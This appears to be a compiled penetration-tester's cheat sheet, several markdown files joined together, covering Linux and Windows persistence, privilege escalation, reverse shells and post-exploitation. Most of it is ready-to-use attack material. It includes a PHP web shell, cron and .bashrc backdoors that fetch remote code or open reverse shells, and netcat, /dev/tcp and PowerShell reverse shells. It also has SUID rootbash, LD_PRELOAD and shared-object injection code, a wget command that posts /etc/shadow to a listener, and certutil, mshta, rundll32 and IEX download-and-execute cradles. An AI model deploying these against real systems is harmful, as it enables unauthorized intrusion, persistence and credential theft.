Linux Hosts/Linux Persistence Backdoors.md: -------------------------------------------------------------------------------- 1 | # Linux persistence/backdoors 2 | 3 | ## SSH backdoor 4 | 5 | Generate new keypair. 6 | 7 | ```bash 8 | sshkeygen 9 | ``` 10 | 11 | Add your public key to `authorized_keys` on target machine. 12 | 13 | ```bash 14 | chmod 600 id_rsa 15 | ssh -i id_rsa USER@RHOST 16 | ``` 17 | 18 | ## PHP backdoors 19 | 20 | Webroot usual location: `/var/www/html` 21 | 22 | ```php 23 | " . shell_exec($_REQUEST['yz']) . ""; 26 | } 27 | ?> 28 |
29 | 30 | 31 |
32 | ``` 33 | 34 | ## Cron jobs 35 | 36 | Cron jobs are located in: `/etc/cronjob` 37 | 38 | ``` 39 | * * * * * root curl http://RHOST/shell.php | bash 40 | ``` 41 | 42 | ```bash 43 | #!/bin/bash 44 | 45 | bash -i >& /dev/tcp/LHOST/LPORT 0>&1 46 | ``` 47 | 48 | ## bashrc backdoor 49 | 50 | Waiting for user to login. 51 | 52 | ```bash 53 | echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc 54 | ``` 55 | 56 | ## More... 57 | 58 | [airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c](https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c) 59 | -------------------------------------------------------------------------------- /Pentesting Linux Hosts/Linux Post-Exploitation.md: -------------------------------------------------------------------------------- 1 | git clone https://github.com/melnicek/peh 2 | 3 | https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html 4 | 5 | cp /bin/bash /tmp/yz 6 | chmod +s /tmp/yz 7 | /tmp/yz -p 8 | 9 | ssh -L LPORT:RHOST:RPORT USER@RHOST -fN 10 | 11 | for i in {1..254}; do (ping -c 1 x.x.x.${i} | grep "bytes from" &); done; sleep 2; arp -en | grep -v incomplete 12 | for i in {1..65535}; do (echo > /dev/tcp/x.x.x.x/$i) >/dev/null 2>&1 && echo $i is open; done 13 | 14 | sudo tcpdump -D 15 | sudo tcpdump -i INTERFACE 16 | sudo tcpdump -i INTERFACE -e 17 | sudo tcpdump -i INTERFACE -X 18 | sudo tcpdump -i INTERFACE host HOST 19 | sudo tcpdump -i INTERFACE src host HOST 20 | sudo tcpdump -i INTERFACE tcp src port PORT 21 | 22 | for i in {1..254}; do (ping -c 1 10.200.101.${i} | grep "bytes from" &); done; sleep 2; arp -en | grep -v incomplete -------------------------------------------------------------------------------- /Pentesting Linux Hosts/Linux Privilege Escalation.md: -------------------------------------------------------------------------------- 1 | # Spawning root shell 2 | 3 | ## Rootbash 4 | 5 | In this method we create a copy of bash binary with root privileges and set SUID bit on, resulting in bash executable which when executed always run with a context of root user. 6 | 7 | ```text 8 | cp /bin/bash /tmp/yzbash; chmod +s /tmp/yzbash 9 | ``` 10 | 11 | After creating a copy, we can run it in unprivileged terminal. 12 | 13 | ```text 14 | /tmp/rootbash -p 15 | ``` 16 | 17 | ## Executable 18 | 19 | We create a simple C program which sets UID to 0 and runs `/bin/bash` . When compiled with root privileges, we can run it afterwards for permanent root backdoor. 20 | 21 | ```text 22 | int main(){ 23 | setuid(0); 24 | system("/bin/bash"); 25 | } 26 | ``` 27 | 28 | Compile it with root privileges. 29 | 30 | ```text 31 | gcc -o 32 | ``` 33 | 34 | ## Msfvenom executable 35 | 36 | Create msfvenom reverse shell, then execute as a root with handler prepared on your attack machine. 37 | 38 | ```text 39 | msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell 40 | ``` 41 | 42 | ## Native reverse shells 43 | 44 | This method needs more research. 45 | 46 | ```text 47 | https://github.com/mthbernardes/rsg 48 | ``` 49 | # Manual enumeration 50 | 51 | ## System enumeration 52 | 53 | ```text 54 | hostname 55 | 56 | # enumerate os version 57 | uname -a 58 | cat /etc/issue 59 | cat /proc/version 60 | cat /etc/*-release 61 | 62 | # enumerate number of cores 63 | lscpu 64 | 65 | # enumerate running services 66 | ps aux 67 | 68 | # enumerate installed packages 69 | dpkg -l 70 | ``` 71 | 72 | ## User enumeration 73 | 74 | ```text 75 | # whoami 76 | whoami 77 | id 78 | 79 | # what can I run as an admin 80 | sudo -l 81 | 82 | # enumerate users 83 | cat /etc/passwd 84 | cat /etc/passwd | cut -d : -f 1 85 | cat /etc/passwd | grep "sh$" 86 | 87 | # enumerate groups 88 | cat /etc/group 89 | ``` 90 | 91 | ## Network enumeration 92 | 93 | ```text 94 | # enumerate network interfaces 95 | ip a 96 | ifconfig 97 | 98 | # enumerate routing table 99 | ip route 100 | routel 101 | 102 | #enumerate arp table 103 | ip neigh 104 | arp -a 105 | 106 | # enumerate open ports and connected clients 107 | netstat -ano 108 | netstat -anp 109 | ss -anp 110 | cat /etc/iptables 111 | ``` 112 | 113 | ## Hunting for interesting files 114 | 115 | ```text 116 | # enumerate by file contents 117 | grep --color=auto -rnw '/' -ie "password" --color=always >/dev/null 118 | grep --color=auto -rnw '/' -ie "pass" --color=always >/dev/null 119 | grep --color=auto -rnw '/' -ie "pwd" --color=always >/dev/null 120 | 121 | # enumerate by file name 122 | locate password | more 123 | locate pass | more 124 | locate pwd | more 125 | 126 | # search for ssh keys 127 | find / -name id_rsa 2>/dev/null 128 | ``` 129 | 130 | # Automated tools 131 | 132 | ### [https://github.com/rebootuser/LinEnum \(linenum.sh\)](https://github.com/rebootuser/LinEnum) 133 | 134 | ### [https://github.com/diego-treitos/linux-smart-enumeration \(lse.sh\)](https://github.com/diego-treitos/linux-smart-enumeration) 135 | 136 | ### [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite \(linpeas.sh\)](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) 137 | 138 | [https://github.com/Anon-Exploiter/SUID3NUM \(suid3num.py\)](https://github.com/Anon-Exploiter/SUID3NUM) 139 | 140 | [https://github.com/zet-/linux-exploit-suggester \(les.sh\)](https://github.com/mzet-/linux-exploit-suggester) 141 | 142 | [https://github.com/sleventyeleven/linuxprivchecker \(linuxprivchecker.py\)](https://github.com/sleventyeleven/linuxprivchecker) 143 | 144 | [https://github.com/AlessandroZ/BeRoot \(beroot.py\)](https://github.com/AlessandroZ/BeRoot) 145 | 146 | [http://pentestmonkey.net/tools/audit/unix-privesc-check \(unix-privesc-check\)](http://pentestmonkey.net/tools/audit/unix-privesc-check) 147 | 148 | ## First 6 scripts can be downloaded by using this bash script 149 | 150 | ```bash 151 | #!/bin/bash 152 | wget "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh" -O linenum.sh 153 | chmod 700 linenum.sh 154 | wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh 155 | chmod 700 lse.sh 156 | wget "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh" -O linpeas.sh 157 | chmod 700 linpeas.sh 158 | wget "https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py" -O suid3num.py 159 | chmod 700 suid3num.py 160 | wget "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh" -O les.sh 161 | chmod 700 les.sh 162 | wget "https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py" -O linuxprivchecker.py 163 | chmod 700 linuxprivchecker.py 164 | ifconfig 165 | echo "sudo python3 -m http.server 80" 166 | ``` 167 | 168 | # Techniques 169 | 170 | ## Kernel exploits 171 | 172 | Enumerate the kernel version: 173 | 174 | ```text 175 | uname -a 176 | cat /etc/issue 177 | ``` 178 | 179 | Then use searchsploit / linux-exploit-suggester / google to find matching exploits: 180 | 181 | ```text 182 | searchsploit linux kernel priv esc 183 | 184 | # or you can use https://github.com/jondonas/linux-exploit-suggester-2 185 | ./linux-exploit-suggester-2.pl -k 186 | ``` 187 | 188 | ## Service exploits 189 | 190 | Firstly enumerate processes running as root. 191 | 192 | ```text 193 | ps aux | grep "^root" 194 | netstat -nl 195 | ``` 196 | 197 | Then enumerate their versions. 198 | 199 | ```text 200 | -v 201 | --version 202 | dpkg -l | grep 203 | rpm -qa | grep 204 | ``` 205 | 206 | Search for exploits for enumerated software versions. 207 | 208 | ## Stored secrets / weak file permissions 209 | 210 | Always search through history files. 211 | 212 | ```text 213 | history 214 | cat ~/.bash_history 215 | cat ~/*_history 216 | ``` 217 | 218 | Also search for files containing "password", "pass", "pwd". 219 | 220 | ```text 221 | find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \; 222 | ``` 223 | 224 | Don't overlook possible interesting files and directories with bad permissions. 225 | 226 | ```text 227 | # Find all writable files in /etc: 228 | find /etc -maxdepth 1 -writable -type f 229 | 230 | # Find all readable files in /etc: 231 | find /etc -maxdepth 1 -readable -type f 232 | 233 | # Find all directories which can be written to: 234 | find / -executable -writable -type d 2> /dev/null 235 | ``` 236 | 237 | ### /etc/shadow \(default: -rw-r--r--\) 238 | 239 | Things you can do: 240 | 241 | 1. If a file is readable, you can try to crack root hash. 242 | 2. If a file is writable, you can replace original hash. 243 | 244 | You can generate new sha-512 \("$6$"\) hash of a password with this command. 245 | 246 | ```text 247 | mkpasswd -m sha-512 248 | ``` 249 | 250 | ### /etc/passwd \(default: -rw-------\) 251 | 252 | Things you can do when the file is writable: 253 | 254 | 1. Deleting `x` , can disable password on older systems. 255 | 2. Replacing `x` with a new password hash generated by `openssl passwd ""` . 256 | 3. Append new user with UID 0, but different username. 257 | 258 | ### SSH keys \(id\_rsa / authorized\_keys\) 259 | 260 | ```text 261 | find / -name authorized_keys 2>/dev/null 262 | find / -name id_rsa 2>/dev/null 263 | ``` 264 | 265 | ### Backups 266 | 267 | Look for interesting files, also backups can be found in these locations. 268 | 269 | ```text 270 | ls -la / 271 | ls -la /tmp 272 | ls -la /var/backups 273 | ``` 274 | 275 | ## Sudo misconfigurations 276 | 277 | Sudo is used to run programs as an another user, by default it's root. 278 | 279 | ```text 280 | sudo -u 281 | ``` 282 | 283 | You can list programs which can be run without requiring password. 284 | 285 | ```text 286 | sudo -l 287 | ``` 288 | 289 | Some ways to escalate privileges with unrestricted sudo: 290 | 291 | ```text 292 | sudo -s 293 | sudo -i 294 | sudo /bin/bash 295 | sudo passwd 296 | ``` 297 | 298 | Shell escape sequences can be found here: [https://gtfobins.github.io/](https://gtfobins.github.io/) 299 | 300 | ### "Intended functionality" 301 | 302 | Some program's intended functionality can also help you to escalate privileges. Always google for possible privilege escalations using programs you have access to. 303 | 304 | #### apache2 example 305 | 306 | When you run apache as a root, you can provide configuration file with a `-f` flag. When a file is not in correct format, apache2 will print first line of a file in error message. We can use this to read first line of a `/etc/shadow` file \(root's hash\) and crack it. 307 | 308 | ```text 309 | sudo apache2 -f /etc/shadow 310 | ``` 311 | 312 | #### wget example 313 | 314 | Wget command can not only download files, but also post files to webserver. 315 | 316 | You can setup netcat listener on your machine and then by running this command on target machine, will send `/etc/shadow` your way. 317 | 318 | ```text 319 | sudo wget --post-file=/etc/shadow : 320 | ``` 321 | 322 | ### LD\_PRELOAD 323 | 324 | When LD\_PRELOAD enviroment variable is set and you run the executable, ld will first run specified library and only after that will execute original program. 325 | 326 | Firstly we create source code file for a shared object. 327 | 328 | ```c 329 | #include 330 | #include 331 | #include 332 | 333 | void _init(){ 334 | unsetenv("LD_PRELOAD"); 335 | setgid(0); 336 | setuid(0); 337 | system("cp /bin/bash /tmp/yz && chmod +s /tmp/yz && /tmp/yz -p"); 338 | } 339 | ``` 340 | 341 | Then compile this C code as a shared object. 342 | 343 | ```text 344 | gcc -fPIC -shared -o shell.so shell.c -nostartfile 345 | ``` 346 | 347 | Preload this shared object when you run executable you have permission to run with sudo. 348 | 349 | ```text 350 | sudo LD_PRELOAD= 351 | ``` 352 | 353 | ### CVE-2019-14287 354 | 355 | If your user has disabled access to some executable. 356 | 357 | ```text 358 | user ALL=(ALL,!root) /bin/bash 359 | ``` 360 | 361 | With ALL specified, user can run the binary `/bin/bash` as any user \(not only root user, other user id's works too\). 362 | 363 | ```text 364 | sudo -u#-1 /bin/bash 365 | ``` 366 | 367 | ### CVE-2019-18634 368 | 369 | When `pwfeedback` is set in a specific versions of sudo \(<1.8.25p\), we can trigger stack-based buffer overflow. Exploiting the bug does not require sudo permissions, merely that `pwfeedback` be enabled. 370 | 371 | ```text 372 | Matching Defaults entries for user on linux-build: 373 | insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail 374 | 375 | User user may run the following commands on linux-build: 376 | (ALL : ALL) ALL 377 | ``` 378 | 379 | The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password. 380 | 381 | ```text 382 | wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c -O exploit.c 383 | gcc -o exploit exploit.c 384 | ./exploit 385 | ``` 386 | 387 | ## SUID / SGID files 388 | 389 | You can list SUID executable with this command. 390 | 391 | ```text 392 | find / -perm -4000 -type f -exec ls --color=auto -l {} \;2>/dev/null 393 | ``` 394 | 395 | Check for easy wins: [https://gtfobins.github.io/](https://gtfobins.github.io/) 396 | 397 | This script is great: [https://github.com/Anon-Exploiter/SUID3NUM](https://github.com/Anon-Exploiter/SUID3NUM) 398 | 399 | ```text 400 | wget https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py 401 | ``` 402 | 403 | ```text 404 | # Running strace against a command: 405 | strace -v -f -e execve 2>&1 | grep exec 406 | 407 | # Running ltrace against a command: 408 | ltrace 409 | ``` 410 | 411 | ### Shared object injection 412 | 413 | Sometimes executables use third party shared objects, which we are able to hijack and run our malicious code, with permissions of original executable. 414 | 415 | You can run `strings` on SUID executables, then look for shared object paths. 416 | 417 | Also `strace` can show objects used by the executable. 418 | 419 | ```text 420 | strace 2>&1 421 | strace 2>&1 | grep -i -E "open|access|no such file" 422 | ``` 423 | 424 | ```c 425 | #include 426 | #include 427 | 428 | static void inject() __attribute__((constructor)); 429 | 430 | void inject(){ 431 | system("cp /bin/bash /tmp/yz && chmod +s /tmp/yz && /tmp/yz -p"); 432 | } 433 | ``` 434 | 435 | Compile shared object with gcc. 436 | 437 | ```text 438 | gcc -shared -fPIC -o shared_object.c 439 | ``` 440 | 441 | ### Binary simlinks 442 | 443 | [https://packetstormsecurity.com/files/139750/Nginx-Root-Privilege-Escalation.html](https://packetstormsecurity.com/files/139750/Nginx-Root-Privilege-Escalation.html) 444 | 445 | ### Enviromental variables \(PATH\) 446 | 447 | Find anything related to enviromental variables\(PATH, etc...\) 448 | 449 | ```text 450 | strings 451 | ``` 452 | 453 | When you find executable called without full path, create your own with same name. 454 | 455 | ```c 456 | void main(){ 457 | setgid(0); 458 | setuid(0); 459 | system("cp /bin/bash /tmp/yz && chmod +s /tmp/yz && /tmp/yz -p"); 460 | } 461 | ``` 462 | 463 | Then compile it. 464 | 465 | ```text 466 | gcc executable.c -o executable 467 | ``` 468 | 469 | And change path to your working directory. 470 | 471 | ```text 472 | export PATH=/tmp:$PATH 473 | ``` 474 | 475 | ### Malicious bash functions 476 | 477 | Find out if executable runs any bash commands. 478 | 479 | ```text 480 | strings 481 | ``` 482 | 483 | When you find one, create a bash function. 484 | 485 | ```text 486 | function /command/you/found() {cp /bin/bash /tmp/yz && chmod +s /tmp/yz && /tmp/yz -p} 487 | export -f /command/you/found 488 | ``` 489 | 490 | Again run original executable. But now it will run your bash function instead of original command. 491 | 492 | ## Capabilities 493 | 494 | Kernel 2.2 and higher. 495 | 496 | ```text 497 | getcap -r / 2>/dev/null 498 | ``` 499 | 500 | You are looking for `+ep` , like this. 501 | 502 | ```text 503 | /usr/bin/python2.6 = cap_setuid+ep 504 | ``` 505 | 506 | And then: [https://gtfobins.github.io/\#+capabilities](https://gtfobins.github.io/#+capabilities) 507 | 508 | ```text 509 | /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/sh")' 510 | ``` 511 | 512 | ## Cron jobs 513 | 514 | Crons can be enumerated with: 515 | 516 | ```text 517 | cat /etc/crontab 518 | ``` 519 | 520 | Also located in these directories. 521 | 522 | ```text 523 | /var/spool/cron/ 524 | /var/spool/cron/crontabs/ 525 | ``` 526 | 527 | The crontab PATH environment variable is by default set to `/usr/bin:/bin` 528 | 529 | ### Cron paths 530 | 531 | PATH + relative path = win 532 | 533 | ### Wildcards \(\*\) 534 | 535 | When. 536 | 537 | ```text 538 | cd /home/user 539 | tar czf /tmp/backup.tar.gz * 540 | ``` 541 | 542 | Then you can. 543 | 544 | ```text 545 | echo "cp /bin/bash /tmp/yz && chmod +s /tmp/yz" > malicious.sh 546 | chmod +x malicious.sh 547 | touch ./--checkpoint=1 548 | touch ./--checkpoint-action=exec=sh\malicious.sh 549 | ``` 550 | 551 | ## NFS root squashing 552 | 553 | Check for `no_root_squash` . 554 | 555 | ```text 556 | cat /etc/exports 557 | ``` 558 | 559 | Then you can list mountable folders from your attacker machine. 560 | 561 | ```text 562 | showmount -e 563 | ``` 564 | 565 | And mount one of them. 566 | 567 | ```text 568 | mkdir /tmp/ 569 | mount -o rw,vers=2 :/ /tmp/ 570 | ``` 571 | 572 | Create a .c file inside your newly mounted folder. 573 | 574 | ```c 575 | void main(){ 576 | setgid(0); 577 | setuid(0); 578 | system("cp /bin/bash /tmp/yz && chmod +s /tmp/yz && /tmp/yz -p"); 579 | } 580 | ``` 581 | 582 | Compile it and set SUID bit on. 583 | 584 | ```text 585 | gcc malicious.c -o malicious 586 | chmod +s malicious 587 | ``` 588 | 589 | Finally, run it from target machine. 590 | 591 | ## Docker 592 | 593 | If you are member of a `docker` group, you can easily escalate to root. 594 | 595 | ```text 596 | docker run -v /:/tmp -i -t bash bash 597 | ``` 598 | 599 | 600 | 601 | # Privilege escalation 602 | 603 | ## Situational awareness 604 | 605 | ```text 606 | id 607 | cat /etc/passwd 608 | hostname 609 | cat /etc/issue 610 | cat /etc/*-release 611 | uname -a 612 | ps aux 613 | ip a 614 | ifconfig 615 | route 616 | routel 617 | netstat -anp 618 | ss -anp 619 | cat /etc/iptables 620 | la -lah /etc/cron* 621 | dpkg -l 622 | 623 | # page 528 for more 624 | ``` 625 | 626 | ## Spawning root shell 627 | 628 | ### Rootbash 629 | 630 | ```text 631 | cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash 632 | /tmp/rootbash -p 633 | ``` 634 | 635 | ### Executable 636 | 637 | Create bash wrapper in c 638 | 639 | ```text 640 | int main(){ 641 | setuid(0); 642 | system("/bin/bash"); 643 | } 644 | ``` 645 | 646 | Then, compile it as a root 647 | 648 | ```text 649 | gcc -o 650 | ``` 651 | 652 | ### Msfvenom executable 653 | 654 | Create msfvenom payload, then execute as a root. 655 | 656 | ```text 657 | msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell 658 | ``` 659 | 660 | ### Native reverse shells 661 | 662 | ```text 663 | https://github.com/mthbernardes/rsg 664 | ``` 665 | 666 | ## Enumeration tools 667 | 668 | ```text 669 | https://github.com/diego-treitos/linux-smart-enumeration 670 | https://github.com/rebootuser/LinEnum 671 | https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite 672 | https://github.com/sleventyeleven/linuxprivchecker 673 | https://github.com/AlessandroZ/BeRoot 674 | http://pentestmonkey.net/tools/audit/unix-privesc-check 675 | ``` 676 | 677 | ## Techniques 678 | 679 | ### Kernel exploits 680 | 681 | Enumerate the kernel version: 682 | 683 | ```text 684 | uname -a 685 | cat /etc/issue 686 | ``` 687 | 688 | Use searchsploit to find matching exploits: 689 | 690 | ```text 691 | searchsploit linux kernel priv esc 692 | 693 | # or you can use https://github.com/jondonas/linux-exploit-suggester-2 694 | ./linux-exploit-suggester-2.pl -k 695 | ``` 696 | 697 | ### Service exploits 698 | 699 | Show processes running as root: 700 | 701 | ```text 702 | ps aux | grep "^root" 703 | netstat -nl 704 | ``` 705 | 706 | Enumerate program versions: 707 | 708 | ```text 709 | -v 710 | --version 711 | dpkg -l | grep 712 | rpm -qa | grep 713 | ``` 714 | 715 | Search for exploits 716 | 717 | ### Weak file permissions 718 | 719 | ```text 720 | # Find all writable files in /etc: 721 | find /etc -maxdepth 1 -writable -type f 722 | 723 | # Find all readable files in /etc: 724 | find /etc -maxdepth 1 -readable -type f 725 | 726 | # Find all directories which can be written to: 727 | find / -executable -writable -type d 2> /dev/null 728 | ``` 729 | 730 | #### /etc/shadow 731 | 732 | 1. Crack root hash. 733 | 2. Replace original hash with new: 734 | 735 | ```text 736 | mkpasswd -m sha-512 737 | ``` 738 | 739 | #### /etc/passwd 740 | 741 | 1. Delete `x` , works on older systems. 742 | 2. Replace `x` with new password hash generated by `openssl passwd ""` . 743 | 3. Append new user with UID 0, but different username. 744 | 745 | ### Backups 746 | 747 | Look for interesting files: 748 | 749 | ```text 750 | ls -la / 751 | ls -la /tmp 752 | ls -la /var/backups 753 | ``` 754 | 755 | ### Sudo 756 | 757 | ```text 758 | # Run a program using sudo: 759 | sudo 760 | 761 | # Run a program as a specific user: 762 | sudo -u 763 | 764 | # List programs a user is allowed (and disallowed) to run: 765 | sudo -l 766 | ``` 767 | 768 | Other ways to escalate privileges with sudo: 769 | 770 | ```text 771 | sudo -s 772 | sudo -i 773 | sudo /bin/bash 774 | sudo passwd 775 | ``` 776 | 777 | Shell escape sequences for more programs can be found here: 778 | 779 | ```text 780 | https://gtfobins.github.io/ 781 | ``` 782 | 783 | ### Cron jobs 784 | 785 | Located in: 786 | 787 | ```text 788 | /var/spool/cron/ 789 | /var/spool/cron/crontabs/ 790 | /etc/crantab 791 | ``` 792 | 793 | The crontab PATH environment variable is by default set to `/usr/bin:/bin` 794 | 795 | ### SUID / SGID files 796 | 797 | ```text 798 | find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \;2> /dev/null 799 | find / -user -perm -4000 -exec ls -ldb {} \; 2>/dev/null 800 | ``` 801 | 802 | ```text 803 | https://github.com/Anon-Exploiter/SUID3NUM 804 | ``` 805 | 806 | ```text 807 | # Running strings against a file: 808 | strings 809 | 810 | # Running strace against a command: 811 | strace -v -f -e execve 2>&1 | grep exec 812 | 813 | # Running ltrace against a command: 814 | ltrace 815 | ``` 816 | 817 | ## Privesc strategy 818 | 819 | Spend some time and read over the results of your enumeration. 820 | 821 | If Linux Smart Enumeration level 0 or 1 finds something interesting, make a note of it. Create a checklist of things you need for the privilege escalation method to work. 822 | 823 | Have a quick look around for files in your user’s home directory and other common locations \(e.g. /var/backup, /var/logs\). If your user has a history file, read it, it may have important information like commands or even passwords. 824 | 825 | Try things that don’t have many steps first, e.g. Sudo, Cron Jobs, SUID files. 826 | 827 | Have a good look at root processes, enumerate their versions and search for exploits. 828 | 829 | Check for internal ports that you might be able to forward to your attacking machine. 830 | 831 | If you still don’t have root, re-read your full enumeration dumps and highlight anything that seems odd. This might be a process or file name you aren’t familiar with, an “unusual” filesystem configured \(on Linux, anything that isn’t ext, swap, or tmpfs\), or even a username. 832 | 833 | At this stage you can also start to think about Kernel Exploits. 834 | 835 | -------------------------------------------------------------------------------- /Pentesting Linux Hosts/Linux Reverse Shells.md: -------------------------------------------------------------------------------- 1 | 2 | ```bash 3 | bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1' 4 | rm /tmp/y;mkfifo /tmp/y;cat /tmp/y|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/y 5 | rm /tmp/y;mkfifo /tmp/y;cat /tmp/y|/bin/ssh -i 2>&1|telnet LHOST LPORT >/tmp/y 6 | nc -e /bin/sh LHOST LPORT 7 | nc -c /bin/sh LHOST LPORT 8 | ``` 9 | 10 | Normalization of a shell. 11 | ```bash 12 | SHELL=/bin/bash script -q /dev/null 13 | [Ctrl + Z] 14 | stty raw -echo 15 | fg 16 | reset 17 | xterm 18 | ``` -------------------------------------------------------------------------------- /Pentesting Windows Hosts/Windows Code Execution to Shell.md: -------------------------------------------------------------------------------- 1 | # Create reverse shell from code execution on Windows machine 2 | 3 | First, you create reverse shell executable with msfvenom. 4 | 5 | ``` 6 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o rev.exe 7 | ``` 8 | 9 | Then you'll host your executable with some http server (in this example I'll use python's http.server). 10 | 11 | ``` 12 | sudo python3 -m http.server 80 13 | ``` 14 | 15 | Now you can setup your listener (multi/handler or normal netcat listener). 16 | 17 | And lastly from target Windows machine you'll execute certutil. 18 | 19 | ``` 20 | cmd.exe /C certutil -urlcache -split -f http://LHOST/rev.exe rev.exe 21 | ``` 22 | 23 | For more: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/ 24 | 25 | ## powershell.exe 26 | 27 | ```powershell 28 | $client = New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 29 | ``` 30 | 31 | ```powershell 32 | $client = New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 33 | ``` 34 | 35 | ```bash 36 | # serve shell.ps1 37 | python3 -m http.server 38 | 39 | # execute on target 40 | powershell "IEX (New-Object Net.WebClient).DownloadString(\"http:///shell.ps1\");" 41 | ``` 42 | 43 | ### Creating encoded powershell commands on linux 44 | 45 | ```bash 46 | echo -n "IEX (New-Object Net.WebClient).downloadstring('')" | iconv --to-code UTF-16LE | base64 -w 0 47 | ``` 48 | 49 | ## mshta.exe 50 | 51 | Runs .hta \(HTML Application\) files 52 | 53 | ```bash 54 | # first, we generate hta-psh file with msfvenom 55 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f hta-psh -o .hta 56 | 57 | # then we start server 58 | python3 -m http.server 59 | 60 | # and run command on target host 61 | mshta.exe http://:/.hta 62 | ``` 63 | 64 | ```text 65 | use exploit/windows/misc/hta_server 66 | 67 | mshta.exe http:///.hta 68 | ``` 69 | 70 | ## rundll32.exe 71 | 72 | ```text 73 | # first, we generate dll file with msfvenom 74 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f dll -o .dll 75 | 76 | # serve a file throught smb 77 | sudo python3 ../smbserver.py -smb2support -user -password `pwd` 78 | 79 | # execute on target 80 | rundll32.exe \\\\.dll,0 81 | ``` 82 | 83 | ```text 84 | use exploit/windows/smb/smb_delivery 85 | 86 | rundll32.exe \\\\.dll,0 87 | ``` 88 | 89 | ## regsrv32.exe 90 | 91 | ```text 92 | use exploit/multi/script/web_delivery 93 | 94 | regsvr32 /s /n /u /i:http://:

/.sct scrobj.dll 95 | ``` 96 | 97 | ## certutil.exe 98 | 99 | ```text 100 | msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -f exe > shell.exe 101 | 102 | # host generated file 103 | python3 -m http.server 80 104 | 105 | # start listener (exploit/multi/handler) 106 | 107 | certutil.exe -urlcache -split -f http:///shell.exe shell.exe & shell.exe 108 | ``` 109 | 110 | ## powershell.exe \(with powercat\) 111 | 112 | ```text 113 | git clone https://github.com/besimorhino/powercat.git 114 | python -m SimpleHTTPServer 80 115 | 116 | powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http:///powercat.ps1');powercat -c -p -e cmd" 117 | ``` 118 | 119 | ## more ... 120 | 121 | ```text 122 | https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/ 123 | ``` 124 | 125 | -------------------------------------------------------------------------------- /Pentesting Windows Hosts/Windows Post-Exploitation.md: -------------------------------------------------------------------------------- 1 | https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html 2 | 3 | # PowerShell Open Port Discovery 4 | ```powershell 5 | 0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("IP",$_)) "Port $_ is open!"} 2>$null} 6 | ``` 7 | 8 | # PowerShell in-memory Download and Execute cradle 9 | ```powershell 10 | iex (iwr 'URL') 11 | 12 | iex (New-Object Net.WebClient).DownloadString('URL') 13 | 14 | $down = [System.NET.WebRequest]::Create("URL") 15 | $read = $down.GetResponse() 16 | IEX ([System.IO.StreamReader]($read.GetResponseStream())).ReadToEnd() 17 | 18 | $file=New-Object -ComObject Msxml2.XMLHTTP;$file.open('GET','URL',$false); 19 | $file.send(); 20 | iex $file.responseText 21 | 22 | $ie=New-Object -ComObject InternetExplorer.Application; 23 | $ie.visible=$False; 24 | $ie.navigate('URL'); 25 | sleep 4; 26 | $response=$ie.Document.body.innerHTML; 27 | $ie.quit(); 28 | iex $response 29 | ``` 30 | 31 | certutil.exe -urlcache -f URL OUTFILE 32 | certutil.exe -urlcache -split -f URL OUTFILE 33 | certutil.exe -decode IN.TXT OUT.exe 34 | 35 | xfreerdp /u:USER /p:PASS /cert:ignore /v:RHOST 36 | 37 | cmdkey /list 38 | vaultcmd /list 39 | vaultcmd /listcreds:"VAULT" 40 | runas /user:USER /savecred EXECUTABLE 41 | 42 | powershell -ep bypass 43 | 44 | . .\\PowerView.ps1 45 | Get-NetUser | select cn 46 | Get-NetGroup -GroupName *admin* 47 | Get-NetShare 48 | 